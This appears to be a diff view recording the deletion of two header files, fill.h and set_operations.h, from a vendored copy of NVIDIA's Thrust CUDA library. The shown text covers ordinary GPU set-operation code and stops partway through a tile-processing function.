|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/CVPR/LIVE/thrust/thrust/system/cpp/detail/fill.h
DELETED
@@ -1,22 +0,0 @@
|
|
1 |
-
/*
|
2 |
-
* Copyright 2008-2013 NVIDIA Corporation
|
3 |
-
*
|
4 |
-
* Licensed under the Apache License, Version 2.0 (the "License");
|
5 |
-
* you may not use this file except in compliance with the License.
|
6 |
-
* You may obtain a copy of the License at
|
7 |
-
*
|
8 |
-
* http://www.apache.org/licenses/LICENSE-2.0
|
9 |
-
*
|
10 |
-
* Unless required by applicable law or agreed to in writing, software
|
11 |
-
* distributed under the License is distributed on an "AS IS" BASIS,
|
12 |
-
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
13 |
-
* See the License for the specific language governing permissions and
|
14 |
-
* limitations under the License.
|
15 |
-
*/
|
16 |
-
|
17 |
-
#pragma once
|
18 |
-
|
19 |
-
#include <thrust/detail/config.h>
|
20 |
-
|
21 |
-
// this system has no special version of this algorithm
|
22 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/CVPR/LIVE/thrust/thrust/system/cuda/detail/set_operations.h
DELETED
@@ -1,1998 +0,0 @@
|
|
1 |
-
/******************************************************************************
|
2 |
-
* Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved.
|
3 |
-
*
|
4 |
-
* Redistribution and use in source and binary forms, with or without
|
5 |
-
* modification, are permitted provided that the following conditions are met:
|
6 |
-
* * Redistributions of source code must retain the above copyright
|
7 |
-
* notice, this list of conditions and the following disclaimer.
|
8 |
-
* * Redistributions in binary form must reproduce the above copyright
|
9 |
-
* notice, this list of conditions and the following disclaimer in the
|
10 |
-
* documentation and/or other materials provided with the distribution.
|
11 |
-
* * Neither the name of the NVIDIA CORPORATION nor the
|
12 |
-
* names of its contributors may be used to endorse or promote products
|
13 |
-
* derived from this software without specific prior written permission.
|
14 |
-
*
|
15 |
-
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
|
16 |
-
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
17 |
-
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
18 |
-
* ARE DISCLAIMED. IN NO EVENT SHALL NVIDIA CORPORATION BE LIABLE FOR ANY
|
19 |
-
* DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
|
20 |
-
* (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
|
21 |
-
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
|
22 |
-
* ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
|
23 |
-
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
|
24 |
-
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
|
25 |
-
*
|
26 |
-
******************************************************************************/
|
27 |
-
#pragma once
|
28 |
-
|
29 |
-
#if THRUST_DEVICE_COMPILER == THRUST_DEVICE_COMPILER_NVCC
|
30 |
-
#include <thrust/system/cuda/detail/util.h>
|
31 |
-
|
32 |
-
#include <thrust/detail/cstdint.h>
|
33 |
-
#include <thrust/detail/temporary_array.h>
|
34 |
-
#include <thrust/system/cuda/detail/execution_policy.h>
|
35 |
-
#include <thrust/system/cuda/detail/core/agent_launcher.h>
|
36 |
-
#include <thrust/system/cuda/detail/par_to_seq.h>
|
37 |
-
#include <thrust/system/cuda/detail/get_value.h>
|
38 |
-
#include <thrust/extrema.h>
|
39 |
-
#include <thrust/pair.h>
|
40 |
-
#include <thrust/set_operations.h>
|
41 |
-
#include <thrust/detail/mpl/math.h>
|
42 |
-
#include <thrust/distance.h>
|
43 |
-
#include <thrust/detail/alignment.h>
|
44 |
-
|
45 |
-
namespace thrust
|
46 |
-
{
|
47 |
-
|
48 |
-
namespace cuda_cub {
|
49 |
-
|
50 |
-
namespace __set_operations {
|
51 |
-
|
52 |
-
template <bool UpperBound,
|
53 |
-
class IntT,
|
54 |
-
class Size,
|
55 |
-
class It,
|
56 |
-
class T,
|
57 |
-
class Comp>
|
58 |
-
THRUST_DEVICE_FUNCTION void
|
59 |
-
binary_search_iteration(It data,
|
60 |
-
Size &begin,
|
61 |
-
Size &end,
|
62 |
-
T key,
|
63 |
-
int shift,
|
64 |
-
Comp comp)
|
65 |
-
{
|
66 |
-
|
67 |
-
IntT scale = (1 << shift) - 1;
|
68 |
-
Size mid = (begin + scale * end) >> shift;
|
69 |
-
|
70 |
-
T key2 = data[mid];
|
71 |
-
bool pred = UpperBound ? !comp(key, key2) : comp(key2, key);
|
72 |
-
if (pred)
|
73 |
-
begin = mid + 1;
|
74 |
-
else
|
75 |
-
end = mid;
|
76 |
-
}
|
77 |
-
|
78 |
-
template <bool UpperBound, class Size, class T, class It, class Comp>
|
79 |
-
THRUST_DEVICE_FUNCTION Size
|
80 |
-
binary_search(It data, Size count, T key, Comp comp)
|
81 |
-
{
|
82 |
-
Size begin = 0;
|
83 |
-
Size end = count;
|
84 |
-
while (begin < end)
|
85 |
-
binary_search_iteration<UpperBound, int>(data,
|
86 |
-
begin,
|
87 |
-
end,
|
88 |
-
key,
|
89 |
-
1,
|
90 |
-
comp);
|
91 |
-
return begin;
|
92 |
-
}
|
93 |
-
|
94 |
-
template <bool UpperBound, class IntT, class Size, class T, class It, class Comp>
|
95 |
-
THRUST_DEVICE_FUNCTION Size
|
96 |
-
biased_binary_search(It data, Size count, T key, IntT levels, Comp comp)
|
97 |
-
{
|
98 |
-
Size begin = 0;
|
99 |
-
Size end = count;
|
100 |
-
|
101 |
-
if (levels >= 4 && begin < end)
|
102 |
-
binary_search_iteration<UpperBound, IntT>(data, begin, end, key, 9, comp);
|
103 |
-
if (levels >= 3 && begin < end)
|
104 |
-
binary_search_iteration<UpperBound, IntT>(data, begin, end, key, 7, comp);
|
105 |
-
if (levels >= 2 && begin < end)
|
106 |
-
binary_search_iteration<UpperBound, IntT>(data, begin, end, key, 5, comp);
|
107 |
-
if (levels >= 1 && begin < end)
|
108 |
-
binary_search_iteration<UpperBound, IntT>(data, begin, end, key, 4, comp);
|
109 |
-
|
110 |
-
while (begin < end)
|
111 |
-
binary_search_iteration<UpperBound, IntT>(data, begin, end, key, 1, comp);
|
112 |
-
return begin;
|
113 |
-
}
|
114 |
-
|
115 |
-
template <bool UpperBound, class Size, class It1, class It2, class Comp>
|
116 |
-
THRUST_DEVICE_FUNCTION Size
|
117 |
-
merge_path(It1 a, Size aCount, It2 b, Size bCount, Size diag, Comp comp)
|
118 |
-
{
|
119 |
-
typedef typename thrust::iterator_traits<It1>::value_type T;
|
120 |
-
|
121 |
-
Size begin = thrust::max<Size>(0, diag - bCount);
|
122 |
-
Size end = thrust::min<Size>(diag, aCount);
|
123 |
-
|
124 |
-
while (begin < end)
|
125 |
-
{
|
126 |
-
Size mid = (begin + end) >> 1;
|
127 |
-
T aKey = a[mid];
|
128 |
-
T bKey = b[diag - 1 - mid];
|
129 |
-
bool pred = UpperBound ? comp(aKey, bKey) : !comp(bKey, aKey);
|
130 |
-
if (pred)
|
131 |
-
begin = mid + 1;
|
132 |
-
else
|
133 |
-
end = mid;
|
134 |
-
}
|
135 |
-
return begin;
|
136 |
-
}
|
137 |
-
|
138 |
-
template <class It1, class It2, class Size, class Size2, class CompareOp>
|
139 |
-
THRUST_DEVICE_FUNCTION pair<Size, Size>
|
140 |
-
balanced_path(It1 keys1,
|
141 |
-
It2 keys2,
|
142 |
-
Size num_keys1,
|
143 |
-
Size num_keys2,
|
144 |
-
Size diag,
|
145 |
-
Size2 levels,
|
146 |
-
CompareOp compare_op)
|
147 |
-
{
|
148 |
-
typedef typename iterator_traits<It1>::value_type T;
|
149 |
-
|
150 |
-
Size index1 = merge_path<false>(keys1,
|
151 |
-
num_keys1,
|
152 |
-
keys2,
|
153 |
-
num_keys2,
|
154 |
-
diag,
|
155 |
-
compare_op);
|
156 |
-
Size index2 = diag - index1;
|
157 |
-
|
158 |
-
bool star = false;
|
159 |
-
if (index2 < num_keys2)
|
160 |
-
{
|
161 |
-
T x = keys2[index2];
|
162 |
-
|
163 |
-
// Search for the beginning of the duplicate run in both A and B.
|
164 |
-
Size start1 = biased_binary_search<false>(keys1,
|
165 |
-
index1,
|
166 |
-
x,
|
167 |
-
levels,
|
168 |
-
compare_op);
|
169 |
-
Size start2 = biased_binary_search<false>(keys2,
|
170 |
-
index2,
|
171 |
-
x,
|
172 |
-
levels,
|
173 |
-
compare_op);
|
174 |
-
|
175 |
-
// The distance between x's merge path and its lower_bound is its rank.
|
176 |
-
// We add up the a and b ranks and evenly distribute them to
|
177 |
-
// get a stairstep path.
|
178 |
-
Size run1 = index1 - start1;
|
179 |
-
Size run2 = index2 - start2;
|
180 |
-
Size total_run = run1 + run2;
|
181 |
-
|
182 |
-
// Attempt to advance b and regress a.
|
183 |
-
Size advance2 = max<Size>(total_run >> 1, total_run - run1);
|
184 |
-
Size end2 = min<Size>(num_keys2, start2 + advance2 + 1);
|
185 |
-
|
186 |
-
Size run_end2 = index2 + binary_search<true>(keys2 + index2,
|
187 |
-
end2 - index2,
|
188 |
-
x,
|
189 |
-
compare_op);
|
190 |
-
run2 = run_end2 - start2;
|
191 |
-
|
192 |
-
advance2 = min<Size>(advance2, run2);
|
193 |
-
Size advance1 = total_run - advance2;
|
194 |
-
|
195 |
-
bool round_up = (advance1 == advance2 + 1) && (advance2 < run2);
|
196 |
-
if (round_up) star = true;
|
197 |
-
|
198 |
-
index1 = start1 + advance1;
|
199 |
-
}
|
200 |
-
return thrust::make_pair(index1, (diag - index1) + star);
|
201 |
-
} // func balanced_path
|
202 |
-
|
203 |
-
template <int _BLOCK_THREADS,
|
204 |
-
int _ITEMS_PER_THREAD = 1,
|
205 |
-
cub::BlockLoadAlgorithm _LOAD_ALGORITHM = cub::BLOCK_LOAD_DIRECT,
|
206 |
-
cub::CacheLoadModifier _LOAD_MODIFIER = cub::LOAD_LDG,
|
207 |
-
cub::BlockScanAlgorithm _SCAN_ALGORITHM = cub::BLOCK_SCAN_WARP_SCANS>
|
208 |
-
struct PtxPolicy
|
209 |
-
{
|
210 |
-
enum
|
211 |
-
{
|
212 |
-
BLOCK_THREADS = _BLOCK_THREADS,
|
213 |
-
ITEMS_PER_THREAD = _ITEMS_PER_THREAD,
|
214 |
-
ITEMS_PER_TILE = _BLOCK_THREADS * _ITEMS_PER_THREAD - 1
|
215 |
-
};
|
216 |
-
|
217 |
-
static const cub::BlockLoadAlgorithm LOAD_ALGORITHM = _LOAD_ALGORITHM;
|
218 |
-
static const cub::CacheLoadModifier LOAD_MODIFIER = _LOAD_MODIFIER;
|
219 |
-
static const cub::BlockScanAlgorithm SCAN_ALGORITHM = _SCAN_ALGORITHM;
|
220 |
-
}; // PtxPolicy
|
221 |
-
|
222 |
-
template<class Arch, class T, class U>
|
223 |
-
struct Tuning;
|
224 |
-
|
225 |
-
namespace mpl = thrust::detail::mpl::math;
|
226 |
-
|
227 |
-
template<class T, class U>
|
228 |
-
struct Tuning<sm30,T,U>
|
229 |
-
{
|
230 |
-
enum
|
231 |
-
{
|
232 |
-
MAX_INPUT_BYTES = mpl::max<size_t, sizeof(T), sizeof(U)>::value,
|
233 |
-
COMBINED_INPUT_BYTES = sizeof(T), // + sizeof(Value),
|
234 |
-
NOMINAL_4B_ITEMS_PER_THREAD = 7,
|
235 |
-
ITEMS_PER_THREAD = mpl::min<
|
236 |
-
int,
|
237 |
-
NOMINAL_4B_ITEMS_PER_THREAD,
|
238 |
-
mpl::max<
|
239 |
-
int,
|
240 |
-
1,
|
241 |
-
((NOMINAL_4B_ITEMS_PER_THREAD * 4) +
|
242 |
-
COMBINED_INPUT_BYTES - 1) /
|
243 |
-
COMBINED_INPUT_BYTES>::value>::value,
|
244 |
-
};
|
245 |
-
|
246 |
-
typedef PtxPolicy<128,
|
247 |
-
ITEMS_PER_THREAD,
|
248 |
-
cub::BLOCK_LOAD_WARP_TRANSPOSE,
|
249 |
-
cub::LOAD_DEFAULT,
|
250 |
-
cub::BLOCK_SCAN_WARP_SCANS>
|
251 |
-
type;
|
252 |
-
}; // tuning sm30
|
253 |
-
|
254 |
-
template<class T, class U>
|
255 |
-
struct Tuning<sm52,T,U>
|
256 |
-
{
|
257 |
-
enum
|
258 |
-
{
|
259 |
-
MAX_INPUT_BYTES = mpl::max<size_t, sizeof(T), sizeof(U)>::value,
|
260 |
-
COMBINED_INPUT_BYTES = sizeof(T), // + sizeof(U),
|
261 |
-
NOMINAL_4B_ITEMS_PER_THREAD = 15,
|
262 |
-
ITEMS_PER_THREAD = mpl::min<
|
263 |
-
int,
|
264 |
-
NOMINAL_4B_ITEMS_PER_THREAD,
|
265 |
-
mpl::max<
|
266 |
-
int,
|
267 |
-
1,
|
268 |
-
((NOMINAL_4B_ITEMS_PER_THREAD * 4) +
|
269 |
-
COMBINED_INPUT_BYTES - 1) /
|
270 |
-
COMBINED_INPUT_BYTES>::value>::value,
|
271 |
-
};
|
272 |
-
|
273 |
-
typedef PtxPolicy<256,
|
274 |
-
ITEMS_PER_THREAD,
|
275 |
-
cub::BLOCK_LOAD_WARP_TRANSPOSE,
|
276 |
-
cub::LOAD_DEFAULT,
|
277 |
-
cub::BLOCK_SCAN_WARP_SCANS>
|
278 |
-
type;
|
279 |
-
}; // tuning sm52
|
280 |
-
|
281 |
-
template<class T, class U>
|
282 |
-
struct Tuning<sm60,T,U>
|
283 |
-
{
|
284 |
-
enum
|
285 |
-
{
|
286 |
-
MAX_INPUT_BYTES = mpl::max<size_t, sizeof(T), sizeof(U)>::value,
|
287 |
-
COMBINED_INPUT_BYTES = sizeof(T), // + sizeof(U),
|
288 |
-
NOMINAL_4B_ITEMS_PER_THREAD = 19,
|
289 |
-
ITEMS_PER_THREAD = mpl::min<
|
290 |
-
int,
|
291 |
-
NOMINAL_4B_ITEMS_PER_THREAD,
|
292 |
-
mpl::max<
|
293 |
-
int,
|
294 |
-
1,
|
295 |
-
((NOMINAL_4B_ITEMS_PER_THREAD * 4) +
|
296 |
-
COMBINED_INPUT_BYTES - 1) /
|
297 |
-
COMBINED_INPUT_BYTES>::value>::value,
|
298 |
-
};
|
299 |
-
|
300 |
-
typedef PtxPolicy<512,
|
301 |
-
ITEMS_PER_THREAD,
|
302 |
-
cub::BLOCK_LOAD_WARP_TRANSPOSE,
|
303 |
-
cub::LOAD_DEFAULT,
|
304 |
-
cub::BLOCK_SCAN_WARP_SCANS>
|
305 |
-
type;
|
306 |
-
}; // tuning sm60
|
307 |
-
|
308 |
-
template <class KeysIt1,
|
309 |
-
class KeysIt2,
|
310 |
-
class ValuesIt1,
|
311 |
-
class ValuesIt2,
|
312 |
-
class KeysOutputIt,
|
313 |
-
class ValuesOutputIt,
|
314 |
-
class Size,
|
315 |
-
class CompareOp,
|
316 |
-
class SetOp,
|
317 |
-
class HAS_VALUES>
|
318 |
-
struct SetOpAgent
|
319 |
-
{
|
320 |
-
typedef typename iterator_traits<KeysIt1>::value_type key1_type;
|
321 |
-
typedef typename iterator_traits<KeysIt2>::value_type key2_type;
|
322 |
-
typedef typename iterator_traits<ValuesIt1>::value_type value1_type;
|
323 |
-
typedef typename iterator_traits<ValuesIt2>::value_type value2_type;
|
324 |
-
|
325 |
-
typedef key1_type key_type;
|
326 |
-
typedef value1_type value_type;
|
327 |
-
|
328 |
-
typedef cub::ScanTileState<Size> ScanTileState;
|
329 |
-
|
330 |
-
template <class Arch>
|
331 |
-
struct PtxPlan : Tuning<Arch, key_type, value_type>::type
|
332 |
-
{
|
333 |
-
typedef Tuning<Arch, key_type, value_type> tuning;
|
334 |
-
|
335 |
-
typedef typename core::LoadIterator<PtxPlan, KeysIt1>::type KeysLoadIt1;
|
336 |
-
typedef typename core::LoadIterator<PtxPlan, KeysIt2>::type KeysLoadIt2;
|
337 |
-
typedef typename core::LoadIterator<PtxPlan, ValuesIt1>::type ValuesLoadIt1;
|
338 |
-
typedef typename core::LoadIterator<PtxPlan, ValuesIt2>::type ValuesLoadIt2;
|
339 |
-
|
340 |
-
typedef typename core::BlockLoad<PtxPlan, KeysLoadIt1>::type BlockLoadKeys1;
|
341 |
-
typedef typename core::BlockLoad<PtxPlan, KeysLoadIt2>::type BlockLoadKeys2;
|
342 |
-
typedef typename core::BlockLoad<PtxPlan, ValuesLoadIt1>::type BlockLoadValues1;
|
343 |
-
typedef typename core::BlockLoad<PtxPlan, ValuesLoadIt2>::type BlockLoadValues2;
|
344 |
-
|
345 |
-
typedef cub::TilePrefixCallbackOp<Size,
|
346 |
-
cub::Sum,
|
347 |
-
ScanTileState,
|
348 |
-
Arch::ver>
|
349 |
-
TilePrefixCallback;
|
350 |
-
|
351 |
-
typedef cub::BlockScan<Size,
|
352 |
-
PtxPlan::BLOCK_THREADS,
|
353 |
-
PtxPlan::SCAN_ALGORITHM,
|
354 |
-
1,
|
355 |
-
1,
|
356 |
-
Arch::ver>
|
357 |
-
BlockScan;
|
358 |
-
|
359 |
-
// gather required temporary storage in a union
|
360 |
-
//
|
361 |
-
union TempStorage
|
362 |
-
{
|
363 |
-
struct
|
364 |
-
{
|
365 |
-
typename BlockScan::TempStorage scan;
|
366 |
-
typename TilePrefixCallback::TempStorage prefix;
|
367 |
-
};
|
368 |
-
|
369 |
-
struct
|
370 |
-
{
|
371 |
-
core::uninitialized_array<int, PtxPlan::BLOCK_THREADS>
|
372 |
-
offset;
|
373 |
-
union
|
374 |
-
{
|
375 |
-
typename BlockLoadKeys1::TempStorage load_keys1;
|
376 |
-
typename BlockLoadKeys2::TempStorage load_keys2;
|
377 |
-
typename BlockLoadValues1::TempStorage load_values1;
|
378 |
-
typename BlockLoadValues2::TempStorage load_values2;
|
379 |
-
|
380 |
-
// Allocate extra shmem than truely neccessary
|
381 |
-
// This will permit to avoid range checks in
|
382 |
-
// serial set operations, e.g. serial_set_difference
|
383 |
-
core::uninitialized_array<
|
384 |
-
key_type,
|
385 |
-
PtxPlan::ITEMS_PER_TILE + PtxPlan::BLOCK_THREADS>
|
386 |
-
keys_shared;
|
387 |
-
|
388 |
-
core::uninitialized_array<
|
389 |
-
value_type,
|
390 |
-
PtxPlan::ITEMS_PER_TILE + PtxPlan::BLOCK_THREADS>
|
391 |
-
values_shared;
|
392 |
-
};
|
393 |
-
};
|
394 |
-
}; // union TempStorage
|
395 |
-
}; // struct PtxPlan
|
396 |
-
|
397 |
-
typedef typename core::specialize_plan_msvc10_war<PtxPlan>::type::type ptx_plan;
|
398 |
-
|
399 |
-
typedef typename ptx_plan::KeysLoadIt1 KeysLoadIt1;
|
400 |
-
typedef typename ptx_plan::KeysLoadIt2 KeysLoadIt2;
|
401 |
-
typedef typename ptx_plan::ValuesLoadIt1 ValuesLoadIt1;
|
402 |
-
typedef typename ptx_plan::ValuesLoadIt2 ValuesLoadIt2;
|
403 |
-
|
404 |
-
typedef typename ptx_plan::BlockLoadKeys1 BlockLoadKeys1;
|
405 |
-
typedef typename ptx_plan::BlockLoadKeys2 BlockLoadKeys2;
|
406 |
-
typedef typename ptx_plan::BlockLoadValues1 BlockLoadValues1;
|
407 |
-
typedef typename ptx_plan::BlockLoadValues2 BlockLoadValues2;
|
408 |
-
|
409 |
-
typedef typename ptx_plan::TilePrefixCallback TilePrefixCallback;
|
410 |
-
typedef typename ptx_plan::BlockScan BlockScan;
|
411 |
-
|
412 |
-
typedef typename ptx_plan::TempStorage TempStorage;
|
413 |
-
|
414 |
-
enum
|
415 |
-
{
|
416 |
-
ITEMS_PER_THREAD = ptx_plan::ITEMS_PER_THREAD,
|
417 |
-
BLOCK_THREADS = ptx_plan::BLOCK_THREADS,
|
418 |
-
};
|
419 |
-
|
420 |
-
struct impl
|
421 |
-
{
|
422 |
-
//---------------------------------------------------------------------
|
423 |
-
// Per-thread fields
|
424 |
-
//---------------------------------------------------------------------
|
425 |
-
|
426 |
-
TempStorage & storage;
|
427 |
-
ScanTileState &tile_state;
|
428 |
-
KeysLoadIt1 keys1_in;
|
429 |
-
KeysLoadIt2 keys2_in;
|
430 |
-
ValuesLoadIt1 values1_in;
|
431 |
-
ValuesLoadIt2 values2_in;
|
432 |
-
Size keys1_count;
|
433 |
-
Size keys2_count;
|
434 |
-
KeysOutputIt keys_out;
|
435 |
-
ValuesOutputIt values_out;
|
436 |
-
CompareOp compare_op;
|
437 |
-
SetOp set_op;
|
438 |
-
pair<Size, Size> *partitions;
|
439 |
-
std::size_t *output_count;
|
440 |
-
|
441 |
-
//---------------------------------------------------------------------
|
442 |
-
// Utility functions
|
443 |
-
//---------------------------------------------------------------------
|
444 |
-
|
445 |
-
template <bool IS_FULL_TILE, class T, class It1, class It2>
|
446 |
-
THRUST_DEVICE_FUNCTION void
|
447 |
-
gmem_to_reg(T (&output)[ITEMS_PER_THREAD],
|
448 |
-
It1 input1,
|
449 |
-
It2 input2,
|
450 |
-
int count1,
|
451 |
-
int count2)
|
452 |
-
{
|
453 |
-
if (IS_FULL_TILE)
|
454 |
-
{
|
455 |
-
#pragma unroll
|
456 |
-
for (int ITEM = 0; ITEM < ITEMS_PER_THREAD - 1; ++ITEM)
|
457 |
-
{
|
458 |
-
int idx = BLOCK_THREADS * ITEM + threadIdx.x;
|
459 |
-
output[ITEM] = (idx < count1)
|
460 |
-
? static_cast<T>(input1[idx])
|
461 |
-
: static_cast<T>(input2[idx - count1]);
|
462 |
-
}
|
463 |
-
|
464 |
-
// last ITEM might be a conditional load even for full tiles
|
465 |
-
// please check first before attempting to load.
|
466 |
-
int ITEM = ITEMS_PER_THREAD - 1;
|
467 |
-
int idx = BLOCK_THREADS * ITEM + threadIdx.x;
|
468 |
-
if (idx < count1 + count2)
|
469 |
-
output[ITEM] = (idx < count1)
|
470 |
-
? static_cast<T>(input1[idx])
|
471 |
-
: static_cast<T>(input2[idx - count1]);
|
472 |
-
}
|
473 |
-
else
|
474 |
-
{
|
475 |
-
#pragma unroll
|
476 |
-
for (int ITEM = 0; ITEM < ITEMS_PER_THREAD; ++ITEM)
|
477 |
-
{
|
478 |
-
int idx = BLOCK_THREADS * ITEM + threadIdx.x;
|
479 |
-
if (idx < count1 + count2)
|
480 |
-
{
|
481 |
-
output[ITEM] = (idx < count1)
|
482 |
-
? static_cast<T>(input1[idx])
|
483 |
-
: static_cast<T>(input2[idx - count1]);
|
484 |
-
}
|
485 |
-
}
|
486 |
-
}
|
487 |
-
}
|
488 |
-
|
489 |
-
template <class T, class It>
|
490 |
-
THRUST_DEVICE_FUNCTION void
|
491 |
-
reg_to_shared(It output,
|
492 |
-
T (&input)[ITEMS_PER_THREAD])
|
493 |
-
{
|
494 |
-
#pragma unroll
|
495 |
-
for (int ITEM = 0; ITEM < ITEMS_PER_THREAD; ++ITEM)
|
496 |
-
{
|
497 |
-
int idx = BLOCK_THREADS * ITEM + threadIdx.x;
|
498 |
-
output[idx] = input[ITEM];
|
499 |
-
}
|
500 |
-
}
|
501 |
-
|
502 |
-
template <class OutputIt, class T, class SharedIt>
|
503 |
-
void THRUST_DEVICE_FUNCTION
|
504 |
-
scatter(OutputIt output,
|
505 |
-
T (&input)[ITEMS_PER_THREAD],
|
506 |
-
SharedIt shared,
|
507 |
-
int active_mask,
|
508 |
-
Size thread_output_prefix,
|
509 |
-
Size tile_output_prefix,
|
510 |
-
int tile_output_count)
|
511 |
-
{
|
512 |
-
using core::sync_threadblock;
|
513 |
-
|
514 |
-
|
515 |
-
|
516 |
-
int local_scatter_idx = thread_output_prefix - tile_output_prefix;
|
517 |
-
#pragma unroll
|
518 |
-
for (int ITEM = 0; ITEM < ITEMS_PER_THREAD; ++ITEM)
|
519 |
-
{
|
520 |
-
if (active_mask & (1 << ITEM))
|
521 |
-
{
|
522 |
-
shared[local_scatter_idx++] = input[ITEM];
|
523 |
-
}
|
524 |
-
}
|
525 |
-
sync_threadblock();
|
526 |
-
|
527 |
-
for (int item = threadIdx.x;
|
528 |
-
item < tile_output_count;
|
529 |
-
item += BLOCK_THREADS)
|
530 |
-
{
|
531 |
-
output[tile_output_prefix + item] = shared[item];
|
532 |
-
}
|
533 |
-
}
|
534 |
-
|
535 |
-
int THRUST_DEVICE_FUNCTION
|
536 |
-
serial_set_op(key_type *keys,
|
537 |
-
int keys1_beg,
|
538 |
-
int keys2_beg,
|
539 |
-
int keys1_count,
|
540 |
-
int keys2_count,
|
541 |
-
key_type (&output)[ITEMS_PER_THREAD],
|
542 |
-
int (&indices)[ITEMS_PER_THREAD],
|
543 |
-
CompareOp compare_op,
|
544 |
-
SetOp set_op)
|
545 |
-
{
|
546 |
-
int active_mask = set_op(keys,
|
547 |
-
keys1_beg,
|
548 |
-
keys2_beg,
|
549 |
-
keys1_count,
|
550 |
-
keys2_count,
|
551 |
-
output,
|
552 |
-
indices,
|
553 |
-
compare_op);
|
554 |
-
|
555 |
-
return active_mask;
|
556 |
-
}
|
557 |
-
|
558 |
-
//---------------------------------------------------------------------
|
559 |
-
// Tile operations
|
560 |
-
//---------------------------------------------------------------------
|
561 |
-
|
562 |
-
template <bool IS_LAST_TILE>
|
563 |
-
void THRUST_DEVICE_FUNCTION
|
564 |
-
consume_tile(Size tile_idx)
|
565 |
-
{
|
566 |
-
using core::sync_threadblock;
|
567 |
-
using core::uninitialized_array;
|
568 |
-
|
569 |
-
pair<Size, Size> partition_beg = partitions[tile_idx + 0];
|
570 |
-
pair<Size, Size> partition_end = partitions[tile_idx + 1];
|
571 |
-
|
572 |
-
Size keys1_beg = partition_beg.first;
|
573 |
-
Size keys1_end = partition_end.first;
|
574 |
-
Size keys2_beg = partition_beg.second;
|
575 |
-
Size keys2_end = partition_end.second;
|
576 |
-
|
577 |
-
// number of keys per tile
|
578 |
-
//
|
579 |
-
int num_keys1 = static_cast<int>(keys1_end - keys1_beg);
|
580 |
-
int num_keys2 = static_cast<int>(keys2_end - keys2_beg);
|
581 |
-
|
582 |
-
|
583 |
-
// load keys into shared memory for further processing
|
584 |
-
key_type keys_loc[ITEMS_PER_THREAD];
|
585 |
-
|
586 |
-
gmem_to_reg<!IS_LAST_TILE>(keys_loc,
|
587 |
-
keys1_in + keys1_beg,
|
588 |
-
keys2_in + keys2_beg,
|
589 |
-
num_keys1,
|
590 |
-
num_keys2);
|
591 |
-
|
592 |
-
reg_to_shared(&storage.keys_shared[0], keys_loc);
|
593 |
-
|
594 |
-
sync_threadblock();
|
595 |
-
|
596 |
-
int diag_loc = min<int>(ITEMS_PER_THREAD * threadIdx.x,
|
597 |
-
num_keys1 + num_keys2);
|
598 |
-
|
599 |
-
pair<int, int> partition_loc =
|
600 |
-
balanced_path(&storage.keys_shared[0],
|
601 |
-
&storage.keys_shared[num_keys1],
|
602 |
-
num_keys1,
|
603 |
-
num_keys2,
|
604 |
-
diag_loc,
|
605 |
-
4,
|
606 |
-
compare_op);
|
607 |
-
|
608 |
-
int keys1_beg_loc = partition_loc.first;
|
609 |
-
int keys2_beg_loc = partition_loc.second;
|
610 |
-
|
611 |
-
// compute difference between next and current thread
|
612 |
-
// to obtain number of elements per thread
|
613 |
-
int value = threadIdx.x == 0
|
614 |
-
? (num_keys1 << 16) | num_keys2
|
615 |
-
: (partition_loc.first << 16) | partition_loc.second;
|
616 |
-
|
617 |
-
int dst = threadIdx.x == 0 ? BLOCK_THREADS - 1 : threadIdx.x - 1;
|
618 |
-
storage.offset[dst] = value;
|
619 |
-
|
620 |
-
core::sync_threadblock();
|
621 |
-
|
622 |
-
pair<int,int> partition1_loc = thrust::make_pair(
|
623 |
-
storage.offset[threadIdx.x] >> 16,
|
624 |
-
storage.offset[threadIdx.x] & 0xFFFF);
|
625 |
-
|
626 |
-
int keys1_end_loc = partition1_loc.first;
|
627 |
-
int keys2_end_loc = partition1_loc.second;
|
628 |
-
|
629 |
-
int num_keys1_loc = keys1_end_loc - keys1_beg_loc;
|
630 |
-
int num_keys2_loc = keys2_end_loc - keys2_beg_loc;
|
631 |
-
|
632 |
-
// perform serial set operation
|
633 |
-
//
|
634 |
-
int indices[ITEMS_PER_THREAD];
|
635 |
-
|
636 |
-
int active_mask = serial_set_op(&storage.keys_shared[0],
|
637 |
-
keys1_beg_loc,
|
638 |
-
keys2_beg_loc + num_keys1,
|
639 |
-
num_keys1_loc,
|
640 |
-
num_keys2_loc,
|
641 |
-
keys_loc,
|
642 |
-
indices,
|
643 |
-
compare_op,
|
644 |
-
set_op);
|
645 |
-
sync_threadblock();
|
646 |
-
#if 0
|
647 |
-
if (ITEMS_PER_THREAD*threadIdx.x >= num_keys1 + num_keys2)
|
648 |
-
active_mask = 0;
|
649 |
-
#endif
|
650 |
-
|
651 |
-
// look-back scan over thread_output_count
|
652 |
-
// to compute global thread_output_base and tile_otput_count;
|
653 |
-
Size tile_output_count = 0;
|
654 |
-
Size thread_output_prefix = 0;
|
655 |
-
Size tile_output_prefix = 0;
|
656 |
-
Size thread_output_count = static_cast<Size>(__popc(active_mask));
|
657 |
-
|
658 |
-
if (tile_idx == 0) // first tile
|
659 |
-
{
|
660 |
-
BlockScan(storage.scan)
|
661 |
-
